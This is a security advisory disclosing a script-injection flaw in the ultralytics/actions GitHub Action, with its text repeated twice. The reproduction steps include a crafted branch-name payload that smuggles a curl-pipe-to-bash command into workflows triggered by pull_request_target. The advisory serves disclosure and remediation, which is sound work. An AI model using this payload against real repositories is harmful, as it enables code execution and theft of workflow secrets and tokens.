

GHSA-7x29-qqmq-v6qc: GitHub Actions Script Injection in `ultralytics/actions`


The Ultralytics action available at is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the pull_request_target trigger, then an attacker can inject arbitrary code into that workflow using a crafted branch name.


The issue exists because the action.yml is a composite action and uses certain fields by GitHub context expression within a run step:

        echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
        echo "github.ref: ${{ github.ref }}"
        echo "github.head_ref: ${{ github.head_ref }}"
        echo "github.base_ref: ${{ github.base_ref }}"

In this case, github.head_ref and github.event.pull_request.head.ref are user controlled and can be used to inject code.


  1. Create a fork of any repository that uses ultralytics/actions within a workflow that runs on pull_request_target.

  2. In the fork create a branch as an injection payload, e.g.: Hacked";{curl,-sSfL,}${IFS}|${IFS}bash

  3. Create a draft pull request.

  4. If the action is reachable, then achieve arbitrary code execution.


See my full POC here ( and, where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.


Any workflow that uses the action and runs on pull_request_target is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the GITHUB_TOKEN or steal secrets from the workflow.


Sanitize the user-controlled variables using environment vars.



The Ultralytics action available at is vulnerable to GitHub Actions script injection. If anyone uses the action within a workflow that runs on the pull_request_target trigger, then an attacker can inject arbitrary code into that workflow using a crafted branch name.


The issue exists because the action.yml is a composite action and uses certain fields by GitHub context expression within a run step:

        echo "github.event.pull_request.head.ref: ${{ github.event.pull_request.head.ref }}"
        echo "github.ref: ${{ github.ref }}"
        echo "github.head_ref: ${{ github.head_ref }}"
        echo "github.base_ref: ${{ github.base_ref }}"

In this case, github.head_ref and github.event.pull_request.head.ref are user controlled and can be used to inject code.


  1. Create a fork of any repository that uses ultralytics/actions within a workflow that runs on pull_request_target.

  2. In the fork create a branch as an injection payload, e.g.: Hacked";{curl,-sSfL,}${IFS}|${IFS}bash

  3. Create a draft pull request.

  4. If the action is reachable, then achieve arbitrary code execution.

See my full POC here ( and, where I created a test workflow that used the action and achieved arbitrary execution using another account by creating a pull request from a fork.


Any workflow that uses the action and runs on pull_request_target is vulnerable to arbitrary code execution within the context of the base branch. An attacker can use this to abuse the GITHUB_TOKEN or steal secrets from the workflow.


Sanitize the user-controlled variables using environment vars.


  • GHSA-7x29-qqmq-v6qc
  • ultralytics/actions@8069e0a

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